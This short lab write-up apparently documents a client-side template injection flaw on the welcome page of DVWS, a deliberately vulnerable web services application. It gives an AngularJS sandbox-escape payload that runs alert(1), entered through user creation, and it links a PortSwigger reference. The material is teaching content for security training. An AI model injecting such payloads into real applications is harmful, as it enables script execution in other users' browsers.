Client-side template injection vulnerabilities arise when applications using a client-side template framework dynamically embed user input in web pages.

The welcome page of the DVWS application is vulnerable to CSTI. This can be exploited by creating a user with the following payload.

{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

• https://portswigger.net/kb/issues/00200308_client-side-template-injection